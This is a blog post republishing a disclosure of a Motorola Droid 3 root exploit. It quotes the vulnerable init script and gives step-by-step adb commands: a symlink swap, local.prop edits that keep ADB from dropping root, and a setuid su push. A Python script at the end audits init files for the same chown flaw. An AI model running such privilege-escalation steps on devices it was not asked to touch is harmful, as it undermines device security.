Motorola Droid 3 gets rooted!! Find out how to root yours!


A member of the XDA forum, djrbliss (Dan Rosenberg), managed to attain root on the Motorola Droid 3. The smartphone was rooted almost a month after its official worldwide release.

The full disclosure of how to get your Moto D3 rooted is below; if you can't do it manually, use the 1-click root method from RootzWiki.

The Bug

I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):

    mkdir /data/local 0771 mot_tcmd shell
    mkdir /data/local/tmp 0771 mot_tcmd shell
    mkdir /data/local/12m 0771 mot_tcmd shell
    mkdir /data/local/12m/batch 0771 mot_tcmd shell
    chown mot_tcmd shell /data/local
    chown mot_tcmd shell /data/local/12m
    chown mot_tcmd shell /data/local/12m/batch
    chown mot_tcmd shell /data/local/tmp

Since the contents of /data/local are group “shell” and group-writable, we can change the contents of this directory using ADB. If we log into the device and replace one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.

So, without further ado:

The Exploit

Log in to the device using “adb shell” and type the following commands:

    mv /data/local/12m /data/local/12m.bak
    ln -s /data /data/local/12m

Next, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:

    rm /data/local/12m
    mv /data/local/12m.bak /data/local/12m
    mv /data/local.prop /data/local.prop.bak
    echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop
    echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop
    echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop
    echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop

The ro.sys.atvc_allow_all_adb property is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one last time, and on logging in with “adb shell”, you should get a prompt with a root console. Enjoy!

    adb remount
    adb push su /system/bin
    adb shell chmod 6755 /system/bin/su

source: Vulnfactory via XDA Forum via RootzWiki
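
For anyone reviewing init scripts on their own builds, the pattern described under “The Bug” can be checked for statically. The following is an added example, not part of the original write-up or of any Motorola or Android code: it flags every chown that init performs on a path whose parent directory the same script creates writable by an untrusted group. The UNTRUSTED_GROUPS set and the function names are assumptions made for this sketch.

```python
import posixpath

# Assumption for this sketch: groups an unprivileged ADB session runs with.
UNTRUSTED_GROUPS = {"shell"}

# The init script lines quoted under "The Bug" above.
INIT_RC = """\
mkdir /data/local 0771 mot_tcmd shell
mkdir /data/local/tmp 0771 mot_tcmd shell
mkdir /data/local/12m 0771 mot_tcmd shell
mkdir /data/local/12m/batch 0771 mot_tcmd shell
chown mot_tcmd shell /data/local
chown mot_tcmd shell /data/local/12m
chown mot_tcmd shell /data/local/12m/batch
chown mot_tcmd shell /data/local/tmp
"""

def writable_dirs(script):
    """Directories created writable by an untrusted group or by everyone."""
    found = set()
    for line in script.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "mkdir":
            mode = int(f[2], 8)
            if mode & 0o002 or (mode & 0o020 and f[4] in UNTRUSTED_GROUPS):
                found.add(posixpath.normpath(f[1]))
    return found

def audit(script):
    """Return (line_no, target, writable_ancestor) for each chown whose target
    lives under a directory that an untrusted user can modify."""
    risky = writable_dirs(script)
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        f = line.split()
        if len(f) != 4 or f[0] != "chown":
            continue
        target = posixpath.normpath(f[3])
        parent = posixpath.dirname(target)
        while parent not in ("/", ""):
            if parent in risky:  # nearest writable ancestor wins
                findings.append((no, target, parent))
                break
            parent = posixpath.dirname(parent)
    return findings

if __name__ == "__main__":
    for no, target, parent in audit(INIT_RC):
        print(f"line {no}: chown on {target}; {parent} is writable by an untrusted group")
```

Each finding is a place where a root-run chown acts on a name that a less-privileged user controls; the usual fixes are to drop group write on the parent or to perform the ownership change without following symlinks.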

 
